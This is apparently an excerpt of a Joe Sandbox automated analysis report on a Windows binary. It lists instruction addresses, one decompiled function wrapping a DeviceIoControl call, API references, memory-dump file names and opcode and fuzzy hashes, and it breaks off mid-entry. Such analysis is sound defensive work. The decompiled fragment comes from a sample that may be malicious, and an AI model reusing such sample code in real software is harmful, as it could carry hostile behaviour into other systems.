                                                                                                    0x003fcc60
                                                                                                    0x003fcc60
                                                                                                    0x003fcc66
                                                                                                    0x003fcc66
                                                                                                    0x003fcc69
                                                                                                    0x003fcc6b
                                                                                                    0x003fcc6b
                                                                                                    0x003fcc76
                                                                                                    0x003fcc7a
                                                                                                    0x00000000
                                                                                                    0x003fcc7a
                                                                                                    0x003fca33
                                                                                                    0x003fca42
                                                                                                    0x003fca45
                                                                                                    0x003fca48
                                                                                                    0x003fca4b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fca51
                                                                                                    0x00000000
                                                                                                    0x003fcba3
                                                                                                    0x003fcba6
                                                                                                    0x003fcbac
                                                                                                    0x003fcbb1
                                                                                                    0x003fcbb4
                                                                                                    0x003fcbb9
                                                                                                    0x003fcbbd
                                                                                                    0x003fcbc1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbc6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbcb
                                                                                                    0x003fcbce
                                                                                                    0x003fcbcf
                                                                                                    0x003fcbd4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fca58
                                                                                                    0x003fca5c
                                                                                                    0x003fca68
                                                                                                    0x003fca6c
                                                                                                    0x003fca81
                                                                                                    0x003fca84
                                                                                                    0x003fca96
                                                                                                    0x003fcaa6
                                                                                                    0x003fcaad
                                                                                                    0x003fcab0
                                                                                                    0x003fcab3
                                                                                                    0x003fcab6
                                                                                                    0x003fcb15
                                                                                                    0x003fcb23
                                                                                                    0x003fcb29
                                                                                                    0x003fcb2c
                                                                                                    0x003fcb2e
                                                                                                    0x003fcb2e
                                                                                                    0x003fcb32
                                                                                                    0x003fcb36
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcab8
                                                                                                    0x003fcab8
                                                                                                    0x003fcabb
                                                                                                    0x003fcac6
                                                                                                    0x003fcac6
                                                                                                    0x003fcac8
                                                                                                    0x003fcacb
                                                                                                    0x003fcad2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcad4
                                                                                                    0x003fcad4
                                                                                                    0x003fcad4
                                                                                                    0x003fcad8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcada
                                                                                                    0x003fcade
                                                                                                    0x003fcadf
                                                                                                    0x003fcae2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcae2
                                                                                                    0x003fcae4
                                                                                                    0x003fcae4
                                                                                                    0x003fcae7
                                                                                                    0x003fcae9
                                                                                                    0x003fcae9
                                                                                                    0x003fcaf7
                                                                                                    0x003fcafc
                                                                                                    0x003fcb05
                                                                                                    0x003fcb06
                                                                                                    0x003fcb09
                                                                                                    0x003fcb10
                                                                                                    0x003fcb10
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbe6
                                                                                                    0x003fcbe9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbee
                                                                                                    0x003fcbf1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbf6
                                                                                                    0x003fcbf9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcb3b
                                                                                                    0x003fcb41
                                                                                                    0x003fcb47
                                                                                                    0x003fcb4c
                                                                                                    0x003fcb50
                                                                                                    0x003fcb50
                                                                                                    0x003fcb50
                                                                                                    0x003fcb54
                                                                                                    0x003fcb57
                                                                                                    0x003fcb5c
                                                                                                    0x003fcb65
                                                                                                    0x003fcb6b
                                                                                                    0x003fcb6e
                                                                                                    0x003fcb73
                                                                                                    0x003fcb77
                                                                                                    0x003fcb7a
                                                                                                    0x003fcb7a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcbdb
                                                                                                    0x003fcbde
                                                                                                    0x003fcbff
                                                                                                    0x003fcbff
                                                                                                    0x003fcc00
                                                                                                    0x003fcc03
                                                                                                    0x003fcc04
                                                                                                    0x003fcc06
                                                                                                    0x003fcb7f
                                                                                                    0x003fcb81
                                                                                                    0x003fcb86
                                                                                                    0x003fcb8f
                                                                                                    0x003fcb92
                                                                                                    0x003fcb94
                                                                                                    0x003fcb97
                                                                                                    0x003fcb9a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcc10
                                                                                                    0x003fcc12
                                                                                                    0x003fcc15
                                                                                                    0x003fcc18
                                                                                                    0x003fcc1b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcc1d
                                                                                                    0x00000000
                                                                                                    0x003fcc24
                                                                                                    0x003fcc24
                                                                                                    0x003fcc24
                                                                                                    0x003fcc24
                                                                                                    0x003fcc27
                                                                                                    0x003fcc2c
                                                                                                    0x003fcc2e
                                                                                                    0x003fcc30
                                                                                                    0x003fcc30
                                                                                                    0x003fcc34
                                                                                                    0x003fcc38
                                                                                                    0x003fcc3c
                                                                                                    0x003fcc3f
                                                                                                    0x003fcc3f
                                                                                                    0x003fcc44
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcc46
                                                                                                    0x003fcc49
                                                                                                    0x003fcc49
                                                                                                    0x00000000
                                                                                                    0x003fcc4e
                                                                                                    0x003fcc1f
                                                                                                    0x003fcc22
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fca51
                                                                                                    0x003fca35
                                                                                                    0x003fca3c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fca3c
                                                                                                    0x003fc9f7
                                                                                                    0x003fc9fe
                                                                                                    0x003fc9fe
                                                                                                    0x00000000
                                                                                                    0x003fc9fe
                                                                                                    0x003fc9f9
                                                                                                    0x003fc9fc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc9fc
                                                                                                    0x003fcc89
                                                                                                    0x003fcc92
                                                                                                    0x003fcc95
                                                                                                    0x003fcc98
                                                                                                    0x003fcc9d
                                                                                                    0x003fcca8
                                                                                                    0x003fcca9
                                                                                                    0x003fcca9
                                                                                                    0x003fccae
                                                                                                    0x003fccb2
                                                                                                    0x003fccb9
                                                                                                    0x003fccbe
                                                                                                    0x003fccc0
                                                                                                    0x003fccc3
                                                                                                    0x003fccc8
                                                                                                    0x003fccd0
                                                                                                    0x003fccd8
                                                                                                    0x003fccd8
                                                                                                    0x003fccde
                                                                                                    0x003fcce3
                                                                                                    0x003fcce8
                                                                                                    0x003fcceb
                                                                                                    0x003fccee
                                                                                                    0x003fccf0
                                                                                                    0x003fccf2
                                                                                                    0x003fccf5
                                                                                                    0x003fcdcd
                                                                                                    0x003fcdd8
                                                                                                    0x003fcde0
                                                                                                    0x003fcde4
                                                                                                    0x003fcde9
                                                                                                    0x00000000
                                                                                                    0x003fccfb
                                                                                                    0x003fccfb
                                                                                                    0x003fccfb
                                                                                                    0x003fccfb
                                                                                                    0x003fccfe
                                                                                                    0x003fcd01
                                                                                                    0x003fcd04
                                                                                                    0x003fcd07
                                                                                                    0x003fcd0b
                                                                                                    0x003fcd0e
                                                                                                    0x003fcd18
                                                                                                    0x003fcd18
                                                                                                    0x003fcd10
                                                                                                    0x003fcd13
                                                                                                    0x003fcd13
                                                                                                    0x003fcd1a
                                                                                                    0x003fcd1c
                                                                                                    0x003fcd72
                                                                                                    0x003fcd76
                                                                                                    0x003fcd79
                                                                                                    0x003fcd83
                                                                                                    0x003fcd83
                                                                                                    0x003fcd7b
                                                                                                    0x003fcd7e
                                                                                                    0x003fcd7e
                                                                                                    0x003fcd85
                                                                                                    0x003fcd8a
                                                                                                    0x003fcd8d
                                                                                                    0x003fcd90
                                                                                                    0x003fcd9d
                                                                                                    0x003fcd9d
                                                                                                    0x003fcd92
                                                                                                    0x003fcd98
                                                                                                    0x003fcd98
                                                                                                    0x003fcd9f
                                                                                                    0x003fcda2
                                                                                                    0x003fcda5
                                                                                                    0x003fcda9
                                                                                                    0x003fcda9
                                                                                                    0x003fcda9
                                                                                                    0x003fcd1e
                                                                                                    0x003fcd1e
                                                                                                    0x003fcd24
                                                                                                    0x003fcd2b
                                                                                                    0x003fcd2d
                                                                                                    0x003fcd32
                                                                                                    0x003fcd34
                                                                                                    0x003fcd3a
                                                                                                    0x003fcd3d
                                                                                                    0x003fcd43
                                                                                                    0x003fcd55
                                                                                                    0x003fcd55
                                                                                                    0x003fcd57
                                                                                                    0x003fcd57
                                                                                                    0x003fcd59
                                                                                                    0x003fcd5c
                                                                                                    0x003fcd67
                                                                                                    0x003fcd67
                                                                                                    0x003fcd6a
                                                                                                    0x003fcd6d
                                                                                                    0x00000000
                                                                                                    0x003fcd6d
                                                                                                    0x003fcd45
                                                                                                    0x003fcd4b
                                                                                                    0x003fcd4e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fcd50
                                                                                                    0x003fcd52
                                                                                                    0x00000000
                                                                                                    0x003fcd52
                                                                                                    0x003fcdad
                                                                                                    0x003fcdad
                                                                                                    0x003fcdb1
                                                                                                    0x003fcdb3
                                                                                                    0x003fcdb9
                                                                                                    0x003fcdb9
                                                                                                    0x003fcdbc
                                                                                                    0x003fcdc0
                                                                                                    0x003fcdc1
                                                                                                    0x003fcdc4
                                                                                                    0x003fcdc4
                                                                                                    0x00000000
                                                                                                    0x003fccfe
                                                                                                    0x003fccf5
                                                                                                    0x003fc978
                                                                                                    0x003fc97a
                                                                                                    0x003fc980
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc984
                                                                                                    0x003fc989
                                                                                                    0x003fc98f
                                                                                                    0x003fc992
                                                                                                    0x003fc994
                                                                                                    0x003fc99b
                                                                                                    0x003fc99b
                                                                                                    0x003fc99b
                                                                                                    0x00000000
                                                                                                    0x003fc99b
                                                                                                    0x003fc82f
                                                                                                    0x003fc82f
                                                                                                    0x003fc832
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc834
                                                                                                    0x003fc83a
                                                                                                    0x003fc842
                                                                                                    0x003fc845
                                                                                                    0x003fc848
                                                                                                    0x003fc84b
                                                                                                    0x003fc84c
                                                                                                    0x003fc84d
                                                                                                    0x003fc853
                                                                                                    0x003fc859
                                                                                                    0x003fc860
                                                                                                    0x003fc863
                                                                                                    0x003fc885
                                                                                                    0x003fc887
                                                                                                    0x003fc892
                                                                                                    0x003fc895
                                                                                                    0x003fc898
                                                                                                    0x003fc898
                                                                                                    0x00000000
                                                                                                    0x003fc898
                                                                                                    0x003fc865
                                                                                                    0x003fc86c
                                                                                                    0x003fc871
                                                                                                    0x003fce3c
                                                                                                    0x003fce42
                                                                                                    0x003fce4a
                                                                                                    0x003fce4a

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003FC7D1
                                                                                                      • Part of subcall function 003FC49F: __EH_prolog.LIBCMT ref: 003FC4A4
                                                                                                    • _CxxThrowException.MSVCRT(?,00438128), ref: 003FCCA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2366012087-0
                                                                                                    • Opcode ID: 23314f1b7201212e66a17ebc3fe5dd771f75cb8eba0ecda97a90761dae2d50e9
                                                                                                    • Instruction ID: 78d6e88bf182cb0faa785dd94d071614876ff3407622701cbea543b2a76335cf
                                                                                                    • Opcode Fuzzy Hash: 23314f1b7201212e66a17ebc3fe5dd771f75cb8eba0ecda97a90761dae2d50e9
                                                                                                    • Instruction Fuzzy Hash: 9332477091024EDFCF16DFA4C690AEDBBB5FF14304F109069E91AAB252DB70AA45CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B81D9 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B81D9(long __ecx, void* __edx) {
				int _t19;
				signed int _t21;
				void* _t36;

				E0041F1B0(E004230CC, _t36);
				 *(_t36 - 0x20) =  *(_t36 - 0x20) | 0xffffffff;
				 *((char*)(_t36 - 0x1c)) = 0;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				if(E003B78C6(__edx, 2, 3, 0x2200000) != 0) {
					_t19 = DeviceIoControl( *(_t36 - 0x20), __ecx,  *(_t36 + 8),  *(_t36 + 0xc), 0, 0, _t36 - 0x10, 0);
					_t21 = E003B7322(_t36 - 0x20) & 0xffffff00 | _t19 != 0x00000000;
				} else {
					E003B7322(_t36 - 0x20);
					_t21 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t21;
			}






                                                                                                    0x003b81de
                                                                                                    0x003b81e6
                                                                                                    0x003b81f0
                                                                                                    0x003b8200
                                                                                                    0x003b820a
                                                                                                    0x003b8229
                                                                                                    0x003b823b
                                                                                                    0x003b820c
                                                                                                    0x003b820f
                                                                                                    0x003b8214
                                                                                                    0x003b8214
                                                                                                    0x003b8243
                                                                                                    0x003b824b

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B81DE
                                                                                                    • DeviceIoControl.KERNEL32 ref: 003B8229
                                                                                                      • Part of subcall function 003B7322: FindCloseChangeNotification.KERNELBASE(00000000,?,003B7285,00000002,?,00000000,00000000), ref: 003B732D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseControlDeviceFindH_prologNotification
                                                                                                    • String ID:
                                                                                                    • API String ID: 3088033693-0
                                                                                                    • Opcode ID: 1d6516997358dc66f897841544666a5de1db2eb5f0ab3b4db99709ce56532f10
                                                                                                    • Instruction ID: 83d65c488c55d5e12206d056ad26e54b05942143b84e490036abe381a563e338
                                                                                                    • Opcode Fuzzy Hash: 1d6516997358dc66f897841544666a5de1db2eb5f0ab3b4db99709ce56532f10
                                                                                                    • Instruction Fuzzy Hash: 7D018F72D00218AADF11AFA4DC81EEEBBBCFB04358F014129F91273591C6384E05CA60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041C3D0 Relevance: 1.9, APIs: 1, Instructions: 356COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldiv
                                                                                                    • String ID:
                                                                                                    • API String ID: 3732870572-0
                                                                                                    • Opcode ID: bff8a3418f91d5eefe41d129dd42e47afd967fb08cddb758c576d0e4e169d733
                                                                                                    • Instruction ID: 99cf4fb15136bf19eb968e8ae36e9e52198dd8b067afc24c790ced53a7a2b9c5
                                                                                                    • Opcode Fuzzy Hash: bff8a3418f91d5eefe41d129dd42e47afd967fb08cddb758c576d0e4e169d733
                                                                                                    • Instruction Fuzzy Hash: F7E19A716443458BC724CF29C8C0AABB7E6BFC8314F148A2EF8598B351D774E985CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041E9D0 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 616674441e54ab969581ddbffc790e697f0e3f015ebbf3fdf5520aa864ace1f0
                                                                                                    • Instruction ID: 4c86515c137034e87d45c77b7ccdc85822224156758aca0a6af32a32cced2381
                                                                                                    • Opcode Fuzzy Hash: 616674441e54ab969581ddbffc790e697f0e3f015ebbf3fdf5520aa864ace1f0
                                                                                                    • Instruction Fuzzy Hash: 8D120A729083158FC358DF4AD44045BF7E2BFC8714F1A8A6EE898A7311DB70E9568BC6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041EBA9 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: c47abc7e48a7f83f8f899088a1631e74dfd633cc524127cf52d37532059240c9
                                                                                                    • Instruction ID: 9bd5943053135daf50a456c3c37a69d882a8b43d9c8eb4ebceb8a5ab23bfe340
                                                                                                    • Opcode Fuzzy Hash: c47abc7e48a7f83f8f899088a1631e74dfd633cc524127cf52d37532059240c9
                                                                                                    • Instruction Fuzzy Hash: 26D13D729083148FC758DF4AD84045BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BA4D0 Relevance: 1.5, APIs: 1, Instructions: 3timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,003EA7DA,00000000,00000000,777989A0), ref: 003BA4D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$FileSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2086374402-0
                                                                                                    • Opcode ID: 68ca4b733cb0188538457372a717bb02f3125a7a1b6a1974c26a45c81dff2482
                                                                                                    • Instruction ID: 633a43cae6b4519d894ed430437b3e46dd7f1bbb2feec0397220af4d6d8a2937
                                                                                                    • Opcode Fuzzy Hash: 68ca4b733cb0188538457372a717bb02f3125a7a1b6a1974c26a45c81dff2482
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00413190 Relevance: 1.4, APIs: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3510742995-0
                                                                                                    • Opcode ID: 8fd9988b7bb9d74dd6aca5ceb6125cf703421f53c850d2d4e9576747bec629b0
                                                                                                    • Instruction ID: eeb544b315c8d25b6361fa6d50d2c25808d3f43ee435dbe2b66dc59b69e41b7b
                                                                                                    • Opcode Fuzzy Hash: 8fd9988b7bb9d74dd6aca5ceb6125cf703421f53c850d2d4e9576747bec629b0
                                                                                                    • Instruction Fuzzy Hash: 5741B072A047069BD704DF19C8815BAB3E0FF88318F044A6EE95A97381E335EE55CB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417290 Relevance: .7, Instructions: 740COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterErrorLastLeaveObjectSingleWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 1001467830-0
                                                                                                    • Opcode ID: e869de30172640f85cdeca46ba86a762596095a85c3d47b3ecca5dbe9ecee147
                                                                                                    • Instruction ID: ff1390c42e2191c61769a73ed1e4f92a622050b95d6236e602de77aae3d5254a
                                                                                                    • Opcode Fuzzy Hash: e869de30172640f85cdeca46ba86a762596095a85c3d47b3ecca5dbe9ecee147
                                                                                                    • Instruction Fuzzy Hash: 0162D2B1A083458FCB24CF19C58056BBBF2BBC8744F148A6EE89987315D774E985CB86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004152C0 Relevance: .7, Instructions: 697COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf7f660701e21bbbb3a7095b92fca4ab51ff96680b6a0968d7ad0d826dbdc33e
                                                                                                    • Instruction ID: d6446ff8a2298d802bd256508134d0cf8fd35c17d0bc9230bbf590f6851814a1
                                                                                                    • Opcode Fuzzy Hash: bf7f660701e21bbbb3a7095b92fca4ab51ff96680b6a0968d7ad0d826dbdc33e
                                                                                                    • Instruction Fuzzy Hash: 8B428E71604B018BD328DF29C9917EAB3E2FBC4344F444A2EE896C7795E778B985CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410DF9 Relevance: .5, Instructions: 519COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                    • Instruction ID: f3e6386ece9917b2efc257a8086c3cbb2f0349135ef4e7f058714eea722b385e
                                                                                                    • Opcode Fuzzy Hash: dc8004adaa3259f52bc6ab735d8be8844deca4391a1dba6202427b66ce1407bc
                                                                                                    • Instruction Fuzzy Hash: D1021873A083514BD714CE19CD80269B7E3BBD1380F2A492FE89647794DAF899C6C789
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411410 Relevance: .5, Instructions: 474COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                                                                                    • Instruction ID: 4d97a95d1e7ec86c7b44ea6e7fbb58f68198912fdf22c149b0f8166f6d0d44ad
